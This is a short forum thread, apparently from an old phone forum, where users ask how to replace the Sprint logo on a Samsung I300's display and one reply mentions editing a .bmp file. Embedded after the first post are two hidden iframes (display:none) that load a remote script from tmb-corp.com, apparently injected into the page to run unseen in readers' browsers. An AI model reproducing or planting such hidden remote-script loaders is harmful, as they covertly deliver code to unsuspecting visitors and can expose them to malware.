+ Reply to Thread

Phone Display Options -- Your own logo?

The I300 gives you three options under "Display" in the preferences tab: The Sprint Logo, your phone number, or custom text.

Has anyone figured out a way to put your own logo up there, instead of sprint's?

-Matt<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dan
    I haven't, but I've wondered the same thing myself. I also wonder if it's possible to create custom phone buttons, too?

Administrator

Arrow

you need a "software tool" in order to get into the section to do this. its a .bmp file. you can go into the apps of the phones directory (filez is a good app to do this with) and locate the .bmp file.. and delete it if you dont like the startup screen.. kyocera had a tool you could DL if you registered as a developer... if you can find this tool for the samsung, your in business..

Re: Phone Display Options -- Your own logo?

By logo, you mean a pic? Dunno

But you can choose from several different style phone/keyboard choices...

Originally posted by comstockery
    The I300 gives you three options under "Display" in the preferences tab: The Sprint Logo, your phone number, or custom text.

Has anyone figured out a way to put your own logo up there, instead of sprint's?

-Matt